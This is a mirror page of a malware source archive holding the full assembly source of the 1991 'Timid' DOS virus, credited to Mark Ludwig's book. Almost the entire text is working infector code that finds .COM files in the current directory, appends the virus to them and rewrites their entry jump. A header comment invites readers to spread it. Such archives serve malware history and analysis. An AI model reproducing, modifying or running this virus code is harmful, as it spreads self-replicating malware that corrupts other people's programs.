mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
196 lines
4.1 KiB
NASM
196 lines
4.1 KiB
NASM
|
;TIMID VIRUS asm by Mark Ludwig in 1991.
|
|||
|
;
|
|||
|
;-infects .coms only in current directory unless called by dos path statement
|
|||
|
;-announces each file infected.
|
|||
|
;297bytes=eff. length
|
|||
|
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
|
|||
|
;Slightly modified for A86 assembly.
|
|||
|
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
|
|||
|
;-fixed bug in code reprinted in his book.
|
|||
|
;all infected files will have VI at byte position 4-5.
|
|||
|
;Mark Ludwig claims copyright on this virus and said he will
|
|||
|
; sue anyone distributing his viruses around. I say have fun!.
|
|||
|
|
|||
|
|
|||
|
main segment byte
|
|||
|
assume cs:main, ds:main, ss:nothing
|
|||
|
|
|||
|
org 100h
|
|||
|
|
|||
|
host:
|
|||
|
jmp near ptr virus_start
|
|||
|
db 'VI' ;identifies virus
|
|||
|
mov ah, 4ch
|
|||
|
mov al, 0
|
|||
|
int 21h
|
|||
|
|
|||
|
virus:
|
|||
|
|
|||
|
comfile db '*.com',0
|
|||
|
|
|||
|
virus_start:
|
|||
|
call get_start
|
|||
|
|
|||
|
get_start:
|
|||
|
sub word ptr [vir_start], offset get_start - offset virus
|
|||
|
mov dx, offset dta
|
|||
|
mov ah, 1ah
|
|||
|
int 21h
|
|||
|
call find_file
|
|||
|
jnz exit_virus
|
|||
|
call infect
|
|||
|
mov dx, offset fname
|
|||
|
mov [handle] b,24h
|
|||
|
mov ah, 9
|
|||
|
int 21h
|
|||
|
exit_virus: ;bug was here in book
|
|||
|
mov dx, 80h
|
|||
|
mov ah, 1ah
|
|||
|
int 21h
|
|||
|
mov bx, [vir_start]
|
|||
|
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
|
|||
|
mov word ptr [host], ax
|
|||
|
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
|
|||
|
mov word ptr [host+2],ax
|
|||
|
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
|
|||
|
mov byte ptr [host+4], al
|
|||
|
mov [vir_start], 100h
|
|||
|
ret
|
|||
|
start_code:
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
find_file:
|
|||
|
mov dx, [vir_start]
|
|||
|
add dx, offset comfile-offset virus
|
|||
|
mov cx, 3fh
|
|||
|
mov ah, 4eh
|
|||
|
int 21h
|
|||
|
|
|||
|
ff_loop:
|
|||
|
or al,al
|
|||
|
jnz ff_done
|
|||
|
call file_ok
|
|||
|
jz ff_done
|
|||
|
mov ah, 4fh
|
|||
|
int 21h
|
|||
|
jmp ff_loop
|
|||
|
|
|||
|
ff_done:
|
|||
|
ret
|
|||
|
|
|||
|
file_ok:
|
|||
|
mov dx, offset fname
|
|||
|
mov ax, 3d02h
|
|||
|
int 21h
|
|||
|
jc fok_nzend
|
|||
|
mov bx, ax
|
|||
|
push bx
|
|||
|
mov cx, 5
|
|||
|
mov dx, offset start_image
|
|||
|
mov ah, 3fh
|
|||
|
int 21h
|
|||
|
pop bx
|
|||
|
mov ah, 3eh
|
|||
|
int 21h
|
|||
|
mov ax, word ptr [fsize]
|
|||
|
add ax, offset endvirus - offset virus
|
|||
|
jc fok_nzend
|
|||
|
cmp byte ptr [start_image], 0e9h
|
|||
|
jnz fok_zend
|
|||
|
|
|||
|
fok_nzend:
|
|||
|
mov al, 1
|
|||
|
or al,al
|
|||
|
ret
|
|||
|
|
|||
|
fok_zend:
|
|||
|
xor al,al
|
|||
|
ret
|
|||
|
|
|||
|
infect:
|
|||
|
mov dx, offset fname
|
|||
|
mov ax, 3d02h
|
|||
|
int 21h
|
|||
|
mov word ptr [handle],ax
|
|||
|
|
|||
|
xor cx,cx
|
|||
|
mov dx,cx
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov ax, 4202h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov cx, offset final -offset virus
|
|||
|
mov dx, [vir_start]
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov ah, 40h
|
|||
|
int 21h
|
|||
|
|
|||
|
xor cx,cx
|
|||
|
mov dx, word ptr [fsize]
|
|||
|
add dx, offset start_code-offset virus
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov ax, 4200h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov cx, 5
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov dx, offset start_image
|
|||
|
mov ah, 40h
|
|||
|
int 21h
|
|||
|
|
|||
|
xor cx,cx
|
|||
|
mov dx,cx
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov ax, 4200h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov bx, [vir_start]
|
|||
|
mov byte ptr [start_image], 0e9h
|
|||
|
mov ax, word ptr [fsize]
|
|||
|
add ax, offset virus_start-offset virus-3
|
|||
|
mov word ptr [start_image+1], ax
|
|||
|
mov word ptr [start_image+3], 4956h
|
|||
|
|
|||
|
mov cx, 5
|
|||
|
mov dx, offset start_image
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov ah, 40h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov bx, word ptr [handle]
|
|||
|
mov ah, 3eh
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
|
|||
|
final:
|
|||
|
|
|||
|
;data area
|
|||
|
endvirus equ $ + 212
|
|||
|
org 0ff2ah
|
|||
|
|
|||
|
dta db 1ah dup (?)
|
|||
|
fsize dw 0,0
|
|||
|
fname db 13 dup (?)
|
|||
|
handle dw 0
|
|||
|
start_image db 0,0,0,0,0
|
|||
|
vstack dw 50h dup (?)
|
|||
|
vir_start dw (?)
|
|||
|
|
|||
|
main ends
|
|||
|
end host
|
|||
|
;end of timid.asm
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|